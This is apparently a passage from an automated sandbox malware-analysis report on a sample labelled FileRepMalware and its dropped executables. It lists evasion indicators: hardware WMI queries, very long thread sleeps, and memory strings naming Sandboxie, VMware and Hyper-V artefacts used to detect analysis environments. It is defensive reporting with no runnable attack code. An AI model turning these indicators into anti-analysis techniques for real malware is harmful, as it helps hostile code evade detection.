                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\hosts.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive (2 occurrences)
Source: C:\Users\user\AppData\Roaming\a.exe	API/Special instruction interceptor: Address: 7FFCC372E814
Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Memory allocated: 3070000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Memory allocated: 3220000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Memory allocated: 5220000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\a.exe	Memory allocated: 2F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\a.exe	Memory allocated: 31E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\a.exe	Memory allocated: 2F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 1680000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 33C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 3300000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 59F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 69F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 8020000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 5D80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Memory allocated: 21EDB000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Memory allocated: 21EF4BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: F90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 2A80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory allocated: 4A80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: F10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 2C50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 2B80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 5340000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 6340000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 7990000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 57D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Memory allocated: 15189460000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Memory allocated: 151A2D50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 1890000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 3260000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\license.exe	Memory allocated: 5260000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\hosts.exe	Memory allocated: 1E7CECA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\hosts.exe	Memory allocated: 1E7E86F0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_085A3BA1 sldt word ptr [eax]
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Window / User API: threadDelayed 593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7101
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2684
Source: C:\Users\user\AppData\Roaming\a.exe	Window / User API: threadDelayed 2647
Source: C:\Users\user\AppData\Roaming\a.exe	Window / User API: threadDelayed 7115
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Window / User API: threadDelayed 6082
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Window / User API: threadDelayed 3624
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe TID: 1396	Thread sleep count: 593 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe TID: 7392	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe TID: 5868	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1252	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7284	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35890s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35781s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35672s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35562s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35453s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35343s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35231s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35125s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -35015s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34906s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34797s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34672s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34562s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34453s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34343s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34234s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34125s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -34015s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -33852s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -33679s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -33578s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -33469s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -33344s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -33234s >= -30000s
Source: C:\Users\user\AppData\Roaming\a.exe TID: 7952	Thread sleep time: -33125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59843s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59577s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59468s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -118436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -118218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -58994s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 6276	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -119750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59575s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59294s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59655s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59418s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59311s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59077s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59471s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59350s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59721s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59568s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59299s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59127s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59642s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59464s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59623s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59487s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59363s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59106s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -58948s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59851s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe TID: 8392	Thread sleep time: -59219s >= -30000s
Source: C:\Windows\System32\svchost.exe	File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\a.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\a.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\a.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 occurrences)
Source: C:\Users\user\AppData\Roaming\hosts.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 36000
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35890
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35781
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35672
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35562
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35453
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35343
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35231
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35125
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 35015
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34906
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34797
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34672
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34562
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34453
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34343
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34234
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34125
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 34015
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 33852
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 33679
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 33578
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 33469
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 33344
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 33234
Source: C:\Users\user\AppData\Roaming\a.exe	Thread delayed: delay time: 33125
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59843
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59687
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59577
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59468
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59339
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59218
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59109
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 58994
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59875
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59719
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59575
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59294
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59172
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59766
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59655
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59531
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59418
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59311
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59188
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59077
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59830
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59703
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59594
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59471
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59350
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59078
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59721
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59568
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59438
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59299
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59127
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59642
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59464
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59282
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59797
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59623
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59487
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59363
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59106
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 58948
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59851
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59735
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59469
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59344
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread delayed: delay time: 59219
Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition/
Source: chrome.exe, 0000000C.00000003.1413518447.0000021F40DB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Packets: Success + Error / sec3296Out - Teredo Relay Total Packets: Success + Error / sec3298In - Teredo Relay Success Packets: Data Packets User Mode3300In - Teredo Relay Success Packets: Data Packets Kernel Mode3302Out - Teredo Relay Success Packets: Data Packets User Mode3304Out - Teredo Relay Success Packets: Data Packets Kernel Mode3306IPHTTPS Session3308Packets received on this session3310Packets sent on this session3312Bytes received on this session3314Bytes sent on this session3316Errors - Transmit errors on this session3318Errors - Receive errors on this session3320Duration - Duration of the session (Seconds)3344DNS64 Global3346AAAA queries - Successful3348AAAA queries - Failed3350IP6.ARPA queries - Matched3352Other queries - Successful3354Other queries - Failed3356AAAA - Synthesized records3322IPHTTPS Global3324In - Total bytes received3326Out - Total bytes sent3328Drops - Neighbor resolution timeouts3330Errors - Authentication Errors3332Out - Total bytes forwarded3334Errors - Transmit errors on the server3336Errors - Receive errors on the server3338In - Total packets received3340Out - Total packets sent3342Sessions - Total sessions3230Teredo Server3232In - Teredo Server Total Packets: Success + Error3234In - Teredo Server Success Packets: Total3236In - Teredo Server Success Packets: Bubbles3238In - Teredo Server Success Packets: Echo3240In - Teredo Server Success Packets: RS-Primary3242In - Teredo Server Success Packets: RS-Secondary3244In - Teredo Server Error Packets: Total3246In - Teredo Server Error Packets: Header Error3248In - Teredo Server Error Packets: Source Error3250In - Teredo Server Error Packets: Destination Error3252In - Teredo Server Error Packets: Authentication Error3254Out - Teredo Server: RA-Primary3256Out - Teredo Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Clas
Source: chrome.exe, 0000000C.00000002.1529061146.00003D3C01474000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware
Source: chrome.exe, 0000000C.00000003.1421070490.0000021F40E47000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processh
Source: chrome.exe, 0000000C.00000002.1510374519.0000021F24D32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000000C.00000003.1472885600.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1510374519.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor!}
Source: chrome.exe, 0000000C.00000003.1472885600.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1510374519.0000021F24DA4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition8ox
Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processorc.sysL+
Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rRD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
                      Source: chrome.exe, 0000000C.00000002.1514580834.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1002_Classes\CLSID\{748F920F-FB24-4D09-B360-BAF6F199AD6D}\InprocServer32e6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global TimI
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                      Source: chrome.exe, 0000000C.00000002.1495197441.0000021F1E847000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                      Source: chrome.exe, 0000000C.00000003.1421070490.0000021F40E47000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1419108757.0000021F40E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828
                      Source: a.exe, 0000000B.00000002.1787672422.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: r3microsoft-hyper-v-drivers-migration-replacement.man
                      Source: chrome.exe, 0000000C.00000003.1419243436.0000021F40DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global TimI
                      Source: chrome.exe, 0000000C.00000002.1510888505.0000021F24EDA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1471920601.0000021F24ED5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service,+
